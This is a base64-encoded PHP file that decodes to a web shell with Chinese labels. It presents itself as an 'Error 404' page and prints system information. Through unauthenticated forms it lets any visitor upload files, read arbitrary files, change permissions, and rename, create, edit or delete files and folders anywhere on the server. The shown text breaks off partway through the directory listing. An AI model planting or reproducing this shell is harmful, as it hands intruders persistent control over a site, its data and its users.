LS0tLS0tLS0tLS0tLS0tLS0tLS0tCgogICAgLyoqIOWPluW+l+ermeeCueagueebruW9lQogICAgICogQHJldHVybiBhcnJheXxzdHJpbmd8c3RyaW5nW10KICAgICAqLwogICAgZnVuY3Rpb24gZG9jdW1lbnRfcm9vdCgpewoKICAgICAgICAkcGhwX3NlbGYgPSBkaXJfcGF0aCgkX1NFUlZFUlsiUEhQX1NFTEYiXSk7CiAgICAgICAgJHNjcmlwdF9maWxlbmFtZSA9IGRpcl9wYXRoKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7CiAgICAgICAgaWYgKGVtcHR5KCRfU0VSVkVSWyJQSFBfU0VMRiJdKSBvciBlbXB0eSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pKXsKICAgICAgICAgICAgJGRvMSA9IGRpcl9wYXRoKCRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0pOwogICAgICAgICAgICAkZG8gPSBydHJpbSgkZG8xLCcvJyk7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRkbyA9IHN0cl9yZXBsYWNlKHN0cl9yZXBsYWNlKCIvLyIsICIvIiwgJHBocF9zZWxmKSwgIiIsIHN0cl9yZXBsYWNlKCJcXFxcIiwgIi8iLCAkc2NyaXB0X2ZpbGVuYW1lKSk7CiAgICAgICAgfQoJCWlmKGVtcHR5KCRkbykpICRkbyA9ICcvJzsKICAgICAgICByZXR1cm4gJGRvOwogICAgfQogICAgJGRvY3VtZW50X3Jvb3QgPSBkb2N1bWVudF9yb290KCk7CiAgICBkZWZpbmUoJ0RPQ1VNRU5UX1JPT1QnLCAkZG9jdW1lbnRfcm9vdCk7CgovLyAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCgoKICAgICRwaHBfdmVyc2lvbiA9IFBIUF9NQUpPUl9WRVJTSU9OOwoJaWYoJHBocF92ZXJzaW9uPD03KXsKCQlpZihnZXRfbWFnaWNfcXVvdGVzX2dwYygpKXsKCQkJZm9yZWFjaCgkX1BPU1QgYXMgJGtleT0+JHZhbHVlKXsKCQkJCSRfUE9TVFska2V5XSA9IHN0cmlwc2xhc2hlcygkdmFsdWUpOwoJCQl9CgkJfQoJfQoKICAgICRWZXJzaW9uID0gYmFzZTY0X2RlY29kZSgnNXB5QTVaQ081NXFFNVlDVTVieTYnKTsKICAgIGlmKGlzc2V0KCRfR0VUWydwYXRoJ10pKXsKICAgICAgICAkcGF0aCA9ICRfR0VUWydwYXRoJ107CiAgICB9ZWxzZXsKICAgICAgICAkcGF0aCA9IGdldGN3ZCgpOwogICAgfQoKCiAgICBlY2hvICc8IWRvY3R5cGUgaHRtbD4KPGh0bWw+CjxoZWFkPgo8dGl0bGU+JkVycm9yXzQwNCY8L3RpdGxlPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCIvPgo8L2hlYWQ+JzsKICAgID8+CgogICAgPGNlbnRlcj4KICAgICAgICA8c3R5bGU+CiAgICAgICAgICAgIGJvZHl7YmFja2dyb3VuZDojZTZlNmU2O2xpbmUtaGVpZ2h0OjE7Y29sb3I6IzAwMDtmb250LWZhbWlseTpDb21pYyBTYW5zIE1TO3dpZHRoOjYwJTttYXJnaW46MCBhdXRvO30KICAgICAgICAgICAgdGFibGUsdGgsdGR7Ym9yZGVyLWNvbGxhcHNlOmNvbGxhcHNlO2JhY2tncm91bmQ6dHJhbnNwYXJlbnQ7Zm9udC1zaXplOjEzcHg7fQogICAgICAgICAgICBpbnB1dCx0ZXh0YXJlYXt9CiAgICAgICAgICAgIC50YWJsZV9ob21lLC50aF9ob21lLC50ZF9ob21le2NvbG9yOmdyZXk7Ym9yZGVyOjFweCBzb2xpZCBncmV5O30KICAgICAgICAgICAgdGh7cGFkZGluZzoxMHB4O30KICAgICAgICAgICAgLnRkX2hvbWV7cGFkZGluZzo3cHg7fQogICAgICAgICAgICBhe2NvbG9yOiMwMDA7IHRleHQtZGVjb3JhdGlvbjpub25lO30KICAgICAgICAgICAgdGV4dGFyZWF7d2lkdGg6MTAwJTtoZWlnaHQ6NDAwcHg7fQogICAgICAgICAgICAjY29udGVudCB0cjpob3ZlcntiYWNrZ3JvdW5kLWNvbG9yOiNjZWNlY2U7dGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmY7Y29sb3I6I2ZmZjt9CiAgICAgICAgICAgIC5kaCBheyBwYWRkaW5nLWxlZnQ6IDEwcHg7IHBhZGRpbmctcmlnaHQ6IDEwcHg7IGJvcmRlci1yaWdodDogMXB4IHNvbGlkICMwMDA7fQogICAgICAgICAgICAuZGggYTpob3ZlcnsgY29sb3I6ICNmMDA7fQogICAgICAgIDwvc3R5bGU+CiAgICA8P3BocAogICAgZWNobyAnPC9oZWFkPgo8Ym9keT48Yj4KPEgxPjxjZW50ZXI+PGZvbnQgY29sb3I9InJlZCI+Jy4kVmVyc2lvbi4nPC9mb250PjwvY2VudGVyPjwvaDE+Cjx0YWJsZSB3aWR0aD0iNzAwIiBib3JkZXI9IjAiIGNlbGxwYWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMSIgYWxpZ249ImNlbnRlciI+Cgo8dHI+PHRkPgoKPGZvbnQgPjxjZW50ZXI+Jy5waHBfdW5hbWUoKS4nPC9jZW50ZXI+PC9mb250Pjxicj4nOwogICAgaWYoaXNzZXQoJF9HRVRbJ3BhdGgnXSkpewogICAgICAgICRwYXRoID0gJF9HRVRbJ3BhdGgnXTsKICAgIH1lbHNlewogICAgICAgICRwYXRoID0gZ2V0Y3dkKCk7CiAgICB9CiAgICAkcGF0aCA9IHN0cl9yZXBsYWNlKCdcXCcsJy8nLCRwYXRoKTsKICAgICRwYXRocyA9IGV4cGxvZGUoJy8nLCRwYXRoKTsKCiAgICAkZ2VuX2xpbmtfdXJsID0gJzxhIHN0eWxlPSJjb2xvcjojMDA2NkZGIiBocmVmPSI/QVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuRE9DVU1FTlRfUk9PVDsKICAgICRnZW5fbGlua191cmwgLj0gJyI+5qC555uu5b2VIO+8miAgICA8L2E+Jm5ic3A7JzsKICAgIGVjaG8gJGdlbl9saW5rX3VybDsKCiAgICBmb3JlYWNoKCRwYXRocyBhcyAkaWQ9PiRwYXQpewogICAgICAgIGlmKCRwYXQgPT0gJycgJiYgJGlkID09IDApewogICAgICAgICAgICAkYSA9IHRydWU7CiAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSMwMDA+CjxhIGhyZWY9Ij9BUlJBWT0nLiRBUlJBWS4nJnBhdGg9LyI+LzwvYT4nOwogICAgICAgICAgICBjb250aW51ZTsKICAgICAgICB9CiAgICAgICAgaWYoJHBhdCA9PSAnJykgY29udGludWU7CiAgICAgICAgZWNobyAnPGEgc3R5bGU9ImNvbG9yOiMwMDY2RkYiIGhyZWY9Ij9BUlJBWT0nLiRBUlJBWS4nJnBhdGg9JzsKICAgICAgICBmb3IoJGk9MDskaTw9JGlkOyRpKyspewogICAgICAgICAgICBlY2hvICIkcGF0aHNbJGldIjsKICAgICAgICAgICAgaWYoJGkgIT0gJGlkKSBlY2hvICIvIjsKICAgICAgICB9CiAgICAgICAgZWNobyAnIj4nLiRwYXQuJzwvYT4vJzsKICAgIH0KICAgIGVjaG8gJzwvZm9udD4KPGJyPjxicj4KPC90ZD48L3RyPjx0cj48dGQ+PGNlbnRlcj4nOwoKICAgIGlmKGlzc2V0KCRfRklMRVNbJ2ZpbGUnXSkpewogICAgICAgIGlmKGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCRwYXRoLicvJy4kX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpewogICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPuS4iuS8oOaIkOWKnyA6KTwvZm9udD48YnIgLz48YnIgLz4nOwogICAgICAgIH1lbHNlewogICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj7kuIrkvKDlpLHotKUgPC9mb250PjxiciAvPjxiciAvPic7CiAgICAgICAgfQogICAgfQogICAgZWNobyAnPC9jZW50ZXI+PGNlbnRlcj48Zm9ybSBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiPjxmb250IGNvbG9yPSJ3aGl0ZSI+PGlucHV0IHN0eWxlPSJiYWNrZ3JvdW5kOmJsYWNrO2ZvbnQtZmFtaWx5OiBDb21pYyBTYW5zIE1TICIgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgLz4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IuS4iuS8oCIgLz4KPC9mb3JtPjwvY2VudGVyPgo8L3RkPjwvdHI+JzsKICAgIGlmKGlzc2V0KCRfR0VUWydmaWxlc3JjJ10pKXsKICAgICAgICBlY2hvICI8dHI+PHRkPjxjZW50ZXI+5b2T5YmN5paH5Lu2IDogIjsKICAgICAgICBlY2hvICRfR0VUWydmaWxlc3JjJ107CiAgICAgICAgZWNobyAnPC9jZW50ZXI+PC90cj48L3RkPjwvdGFibGU+PGJyIC8+JzsKICAgICAgICBlY2hvKCcgPHRleHRhcmVhIHN0eWxlPSJ3aWR0aDogMTAwJTtoZWlnaHQ6IDQwMHB4OyIgcmVhZG9ubHk+ICcuaHRtbHNwZWNpYWxjaGFycyhmaWxlX2dldF9jb250ZW50cygkX0dFVFsnZmlsZXNyYyddKSkuJzwvdGV4dGFyZWE+Jyk7CiAgICB9Ci8vRW1wZXR5CiAgICBlbHNlaWYoaXNzZXQoJF9HRVRbJ29wdGlvbiddKSAmJiAkX0dFVFsnb3B0J10gIT0gJ2RlbGV0ZScpewovLyBlY2hvICc8L3RhYmxlPjxiciAvPjxjZW50ZXI+Jy4kX1BPU1RbJ3BhdGgnXS4nPGJyIC8+PGJyIC8+JzsKICAgICAgICBlY2hvICc8L3RhYmxlPjxiciAvPjxjZW50ZXI+JzsKLy9DaG1vZAogICAgICAgIGlmKCRfR0VUWydvcHQnXSA9PSAnY2htb2QnKXsKICAgICAgICAgICAgaWYoaXNzZXQoJF9QT1NUWydwZXJtJ10pKXsKICAgICAgICAgICAgICAgICRuZXdfcGVybV9vID0gJF9QT1NUWydwZXJtJ107CgogICAgICAgICAgICAgICAgaWYoc3RybGVuKCRuZXdfcGVybV9vKTw9MykgJG5ld19wZXJtX289c3RyX3BhZCgkbmV3X3Blcm1fbywzLCc2JyxTVFJfUEFEX0xFRlQpOwogICAgICAgICAgICAgICAgJG5ld19wZXJtX289aW50dmFsKHN0cl9wYWQoJG5ld19wZXJtX28sNCwnMCcsU1RSX1BBRF9MRUZUKSw4KTsKCiAgICAgICAgICAgICAgICBpZihjaG1vZCgkX1BPU1RbJ3BhdGgnXSwkbmV3X3Blcm1fbykpewogICAgICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+5pu05pS55p2D6ZmQ5oiQ5Yqf77yBIDwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+5pu05pS55p2D6ZmQ6ZSZ6K+v77yBIDwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CgogICAgICAgICAgICAkaGVsbCA9ICRfR0VUWydwYXRoJ107CiAgICAgICAgICAgICR5ZWFoID0gJF9HRVRbJ25hbWUnXTsKICAgICAgICAgICAgJHBhdGMgPSAiJGhlbGwvJHllYWgiOwoKICAgICAgICAgICAgZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIj48YnI+CuW9k+WJjeaWh+S7tiA6ICcuJHBhdGMuJzxicj48YnI+5p2D6ZmQLS0tLScuc3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRwYXRjKSwxMCw4KSwtNCkuJzxicj48YnI+Cuiuvue9ruaWsOadg+mZkCA6IDxpbnB1dCBuYW1lPSJwZXJtIiB0eXBlPSJ0ZXh0IiBzaXplPSI0IiB2YWx1ZT0iJy5zdWJzdHIoc3ByaW50ZignJW8nLCBmaWxlcGVybXMoJHBhdGMpKSwgLTQpLiciIC8+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRwYXRjLiciPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcHQiIHZhbHVlPSJjaG1vZCI+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIC8+CjwvZm9ybT4KPGJyPgo8YSBocmVmPSI/QVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuJGhlbGwuJyIgc3R5bGU9ImRpc3BsYXk6YmxvY2s7IHdpZHRoOjEwMCU7IiB0aXRsZT0i5Y+N5ZueIj7lj43lm548L2E+Cic7CgogICAgICAgIH0KLy8KICAgICAgICBlbHNlaWYoJF9HRVRbJ29wdCddID09ICdidHcnKXsKICAgICAgICAgICAgJGN3ZCA9ICRfR0VUWydwYXRoJ107CgogICAgICAgICAgICBlY2hvICc8Zm9ybSBhY3Rpb249Ij9BUlJBWT0nLiRBUlJBWS4nJm9wdGlvbiZwYXRoPScuJGN3ZC4nJm9wdD1kZWxldGUmdHlwZT1idWF0IiBtZXRob2Q9IlBPU1QiPgrmlrDnm67lvZXlkI0gOiA8aW5wdXQgbmFtZT0ibmFtZSIgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIHZhbHVlPSJGb2xkZXIiIC8+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRjd2QuJyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9ImRlbGV0ZSI+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIC8+CjwvZm9ybT4nOwogICAgICAgIH0KLy9SZW5hbWUgZmlsZQogICAgICAgIGVsc2VpZigkX0dFVFsnb3B0J10gPT0gJ3JlbmFtZScpewogICAgICAgICAgICBpZihpc3NldCgkX1BPU1RbJ25ld25hbWUnXSkpewogICAgICAgICAgICAgICAgaWYocmVuYW1lKCRfUE9TVFsncGF0aCddLCRwYXRoLicvJy4kX1BPU1RbJ25ld25hbWUnXSkpewogICAgICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+6YeN5ZG95ZCN5oiQ5YqfISA6KTwvZm9udD48YnIgLz48YnIgLz4nOwogICAgICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+6YeN5ZG95ZCN5aSx6LSlISA6KCA8L2ZvbnQ+PGJyIC8+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICRfUE9TVFsnbmFtZSddID0gJF9QT1NUWyduZXduYW1lJ107CiAgICAgICAgICAgIH0KICAgICAgICAgICAgJGhlbGwgPSAkX0dFVFsncGF0aCddOwogICAgICAgICAgICAkeWVhaCA9ICRfR0VUWyduYW1lJ107CiAgICAgICAgICAgICRwYXRjID0gIiRoZWxsLyR5ZWFoIjsKICAgICAgICAgICAgJG5ldyA9ICRfUE9TVFsnbmV3bmFtZSddOwoKICAgICAgICAgICAgZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIj4K5paw5ZCN56ewIDogPGlucHV0IG5hbWU9Im5ld25hbWUiIHR5cGU9InRleHQiIHNpemU9IjIwIiB2YWx1ZT0iJy4kbmV3LiciIC8+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRwYXRjLiciPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcHQiIHZhbHVlPSJyZW5hbWUiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiAvPjxicj48YnI+CjxpbnB1dCB0eXBlPSJidXR0b24iIHZhbHVlPSLlj43lm54iIG9uQ2xpY2s9ImphdmFzY3JpcHQ6bG9jYXRpb24uaHJlZj1cJz9BUlJBWT0nLiRBUlJBWS4nJnBhdGg9Jy4kaGVsbC4nXCciPgo8L2Zvcm0+JzsKICAgICAgICB9Ci8vRmlsZSBiYXJ1CiAgICAgICAgZWxzZWlmKCRfR0VUWydvcHQnXSA9PSAnYmFydScpewoKICAgICAgICAgICAgJGhlbGwgPSAkX0dFVFsncGF0aCddOwogICAgICAgICAgICAkeWVhaCA9ICRfR0VUWyduYW1lJ107CiAgICAgICAgICAgICRwYXRjID0gIiRoZWxsLyR5ZWFoIjsKICAgICAgICAgICAgJG5ldyA9IGVtcHR5KCRfUE9TVFsnbmV3bmFtZSddKT8kX1BPU1RbJ25nYXJhbjEnXTokX1BPU1RbJ25ld25hbWUnXTsKICAgICAgICAgICAgJGF6eiA9ICRfUE9TVFsncGF0aCddOwogICAgICAgICAgICAkbmV3eiA9ICRhenouIi8iLiRuZXc7CiAgICAgICAgICAgICRuZXdfZmllbCA9ICRoZWxsLicvJy4kX1BPU1RbJ25nYXJhbjEnXTsKICAgICAgICAgICAgaWYoIWVtcHR5KCRfUE9TVFsnbmdhcmFuMSddKSkgZWNobyAi5q2j5Zyo5paw5bu65paH5Lu277yaeyRuZXdfZmllbH08YnI+PGJyPiI7CiAgICAgICAgICAgIGlmKGlzc2V0KCRfUE9TVFsnc3JjJ10pKXsKICAgICAgICAgICAgICAgICRmcCA9IGZvcGVuKCRfUE9TVFsncGF0aCddLCd3Jyk7CiAgICAgICAgICAgICAgICBpZihmd3JpdGUoJGZwLCRfUE9TVFsnc3JjJ10pKXsKICAgICAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPuaWsOW7uuaWh+S7tuaIkOWKnyBbICcuJGF6ei4nIF08L2ZvbnQ+PGJyIC8+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH1lbHNlewogICAgICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPuaWsOW7uuaWh+S7tuWksei0pSA+Oig8L2ZvbnQ+PGJyIC8+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIGZjbG9zZSgkZnApOwogICAgICAgICAgICB9CgogICAgICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPiDmlrDmlofku7blkI0gOiA8aW5wdXQgbmFtZT0ibmdhcmFuMSIgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIHZhbHVlPSInLiRuZXcuJyIgLz48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJuZ2FyYW4iIC8+PC9mb3JtPjxicj4gJzsKCiAgICAgICAgICAgICRobyA9ICRfUE9TVFsnbmdhcmFuMSddOwoKICAgICAgICAgICAgaWYoaXNzZXQoJF9QT1NUWyduZ2FyYW4nXSkpewogICAgICAgICAgICAgICAgZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIj4KPHRleHRhcmVhIGNvbHM9ODAgcm93cz0yMCBuYW1lPSJzcmMiPicuaHRtbHNwZWNpYWxjaGFycyhmaWxlX2dldF9jb250ZW50cygkcGF0YykpLic8L3RleHRhcmVhPjxiciAvPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXRoIiB2YWx1ZT0iJy4kaGVsbC4nLycuJGhvLiciPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcHQiIHZhbHVlPSJlZGl0Ij4KPGlucHV0IHR5cGU9InN1Ym1pdCIgIC8+CjwvZm9ybT4nOwogICAgICAgICAgICB9CiAgICAgICAgfQovL0VkaXRlZCBmaWxlCiAgICAgICAgZWxzZWlmKCRfR0VUWydvcHQnXSA9PSAnZWRpdCcpewogICAgICAgICAgICBpZihpc3NldCgkX1BPU1RbJ3NyYyddKSl7CiAgICAgICAgICAgICAgICAkZnAgPSBmb3BlbigkX1BPU1RbJ3BhdGgnXSwndycpOwogICAgICAgICAgICAgICAgaWYoZndyaXRlKCRmcCwkX1BPU1RbJ3NyYyddKSl7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj7nvJbovpHmiJDlip/vvIEgPC9mb250PjxiciAvPjxiciAvPic7CiAgICAgICAgICAgICAgICB9ZWxzZXsKICAgICAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj7nvJbovpHlpLHotKXvvIE8L2ZvbnQ+PGJyIC8+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIGZjbG9zZSgkZnApOwogICAgICAgICAgICB9CiAgICAgICAgICAgICRoZWxsID0gJF9HRVRbJ3BhdGgnXTsKICAgICAgICAgICAgJHllYWggPSAkX0dFVFsnbmFtZSddOwogICAgICAgICAgICAkcGF0YyA9ICIkaGVsbC8keWVhaCI7CiAgICAgICAgICAgIGVjaG8gJzxmb3JtIG1ldGhvZD0iUE9TVCI+Cjx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjAgbmFtZT0ic3JjIj4nLmh0bWxzcGVjaWFsY2hhcnMoZmlsZV9nZXRfY29udGVudHMoJHBhdGMpKS4nPC90ZXh0YXJlYT48YnIgLz4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icGF0aCIgdmFsdWU9IicuJHBhdGMuJyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9ImVkaXQiPjxicj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgIC8+Cjxicj4KPGJyPgo8aW5wdXQgdHlwZT0iYnV0dG9uIiB2YWx1ZT0i5Y+N5ZueIiBvbkNsaWNrPSJqYXZhc2NyaXB0OmxvY2F0aW9uLmhyZWY9XCc/QVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuJGhlbGwuJ1wnIj4KCjwvZm9ybT4nOwogICAgICAgIH0KICAgICAgICBlY2hvICc8L2NlbnRlcj4nOwogICAgfWVsc2V7CiAgICAgICAgZWNobyAnPC90YWJsZT48YnIgLz48Y2VudGVyPic7Ci8vRGVsZXRlIGRpciBhbmQgZmlsZQogICAgICAgIGlmKGlzc2V0KCRfR0VUWydvcHRpb24nXSkgJiYgJF9HRVRbJ29wdCddID09ICdkZWxldGUnKXsKCiAgICAgICAgICAgICRoZWxsID0gJF9HRVRbJ3BhdGgnXTsKICAgICAgICAgICAgJHllYWggPSAkX0dFVFsnbmFtZSddOwogICAgICAgICAgICAkcGF0YyA9ICIkaGVsbC8keWVhaCI7CgovL0RlbGV0ZSBkaXIKICAgICAgICAgICAgaWYoJF9HRVRbJ3R5cGUnXSA9PSAnZGlyJyl7CgogICAgICAgICAgICAgICAgaWYocm1kaXIoJHBhdGMpKXsKICAgICAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPuWIoOmZpOaIkOWKn++8gTwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCMiPuWIoOmZpOWksei0pSE+Oig8L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQovL2J1YXQgZm9sZGVyCiAgICAgICAgICAgIGlmKCRfR0VUWyd0eXBlJ10gPT0gJ2J1YXQnKXsKICAgICAgICAgICAgICAgICRoYWFhID0gJF9QT1NUWydwYXRoJ107CiAgICAgICAgICAgICAgICAkaGVlZSA9ICRfUE9TVFsnbmFtZSddOwogICAgICAgICAgICAgICAgJGhvb28gPSAiJGhhYWEvJGhlZWUiOwogICAgICAgICAgICAgICAgJG5ldyA9ICRoYWFhLicvJy5odG1sc3BlY2lhbGNoYXJzKCRoZWVlKTsKICAgICAgICAgICAgICAgIGlmKCFta2RpcigkbmV3KSl7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+5paw5bu655uu5b2V5aSx6LSlITwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj7mlrDlu7rnm67lvZXmiJDlip8hID46KTwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9Ci8vRGVsZXRlIGZpbGUKICAgICAgICAgICAgZWxzZWlmKCRfR0VUWyd0eXBlJ10gPT0gJ2ZpbGUnKXsKCiAgICAgICAgICAgICAgICAkaGVsbCA9ICRfR0VUWydwYXRoJ107CiAgICAgICAgICAgICAgICAkeWVhaCA9ICRfR0VUWyduYW1lJ107CiAgICAgICAgICAgICAgICAkcGF0YyA9ICIkaGVsbC8keWVhaCI7CgogICAgICAgICAgICAgICAgaWYodW5saW5rKCRwYXRjKSl7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj7mlofku7bliKDpmaTmiJDlip88L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH1lbHNlewogICAgICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPuaWh+S7tuWIoOmZpOWksei0pTwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGVjaG8gJzwvY2VudGVyPic7CiAgICAgICAgJHNjYW5kaXIgPSBzY2FuZGlyKCRwYXRoKTsKICAgICAgICAkcGEgPSBnZXRjd2QoKTsKICAgICAgICBlY2hvICcgPGRpdiBpZD0iY29udGVudCI+PHRhYmxlIHdpZHRoPSIxMDAlIiBjbGFzcz0idGFibGVfaG9tZSIgYm9yZGVyPSIwIiBjZWxscGFkZGluZz0iMyIgY2VsbHNwYWNpbmc9IjEiIGFsaWduPSJjZW50ZXIiPgogCjx0cj4KPHRoIGNsYXNzPXRoX2hvbWUgc3R5bGU9ImJhY2tncm91bmQ6YmxhY2s7Y29sb3I6I2ZmZjsiPjxjZW50ZXI+5ZCN56ewPC9jZW50ZXI+PC90aD4KPHRoIGNsYXNzPXRoX2hvbWUgc3R5bGU9ImJhY2tncm91bmQ6YmxhY2s7Y29sb3I6I2ZmZjsiID48Y2VudGVyPuWkp+WwjzwvY2VudGVyPjwvdGg+Cjx0aCBjbGFzcz10aF9ob21lIHN0eWxlPSJiYWNrZ3JvdW5kOmJsYWNrO2NvbG9yOiNmZmY7IiA+PGNlbnRlcj7mnYPpmZA8L2NlbnRlcj48L3RoPgo8dGggY2xhc3M9dGhfaG9tZSBzdHlsZT0iYmFja2dyb3VuZDpibGFjaztjb2xvcjojZmZmOyIgPjxjZW50ZXI+5pON5L2c6YCJ6aG5PC9jZW50ZXI+PC90aD4KPC90cj4KCgogPHRyPgo8dGQgY2xhc3M9InRkX2hvbWUiIGFsaWduPSJjZW50ZXIiPgo8YSBocmVmPSI/QVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuZGlybmFtZSgkcGF0aCkuJyIgc3R5bGU9ImRpc3BsYXk6YmxvY2s7IHdpZHRoOjEwMCU7IiB0aXRsZT0i5LiK5LiA6aG1Ij7kuIrkuIDpobU8L2E+CjwvdGQ+PHRkIGNsYXNzPXRkX2hvbWUgYWxpZ249Y2VudGVyPlNpemU8L3RkPiA8dGQgY2xhc3M9dGRfaG9tZSBhbGlnbj1jZW50ZXI+Q2htb2Q8L3RkPiA8dGQgY2xhc3M9dGRfaG9tZSBhbGlnbj1jZW50ZXI+IDxhIGhyZWY9Ij9vcHRpb24mQVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuJHBhdGguJyZvcHQ9YmFydSZuYW1lPW5ldy5waHAiPisg5paw5bu65paH5Lu2PC9hPiB8IDxhIGhyZWY9Ij9vcHRpb24mQVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuJHBhdGguJyZvcHQ9YnR3JnR5cGU9ZGlyIj4rIOaWsOW7uuebruW9lTwvYT4gPC90ZD48L3RyPgonOwoKICAgICAgICBmb3JlYWNoKCRzY2FuZGlyIGFzICRkaXIpewogICAgICAgICAgICBpZighaXNfZGlyKCIkcGF0aC8kZGlyIikgfHwgJGRpciA9PSAnLicgfHwgJGRpciA9PSAnLi4nKSBjb250aW51ZTsKICAgICAgICAgICAgZWNobyAiCjx0cj4KPHRkIGNsYXNzPXRkX2hvbWU+IDxpbWcgc3JjPSdkYXRhOmltYWdlL3BuZztiYXNlNjQsUjBsR09EbGhFd0FRQUxNQUFBQUFBUC8vLzV5Y0FNN09ZLy8vblAvL3p2L09uUGYzOS8vLy93QUFBQUFBQUFBQUFBQUFBQUFBQUFBQSIuIkFBQUFBQ0g1QkFFQUFBZ0FMQUFBQUFBVEFCQUFBQVJSRU1sSnE3MDQ2eXA2QnhzaUhFVkJFQUtZQ1VQckRwN0hsWFJkRW9NcUNlYnAiLiIvNFljaGZmekdRaEg0WVJZUEIyRE9sSFBpS3dxZDFQcTh5clZWZzNRWWVINVJZSzVySmZhRlVVQTN2QjRmQklCQURzPSc+IDxhIGhyZWY9XCI/QVJSQVk9eyRBUlJBWX0mcGF0aD0kcGF0aC8kZGlyXCI+JGRpcjwvYT48L3RkPgo8dGQgY2xhc3M9dGRfaG9tZSA+PGNlbnRlcj5ESVI8L2NlbnRlcj48L3RkPgo8dGQgY2xhc3M9dGRfaG9tZSBhbGlnbj1jZW50ZXI+CjxhIGhyZWY9XC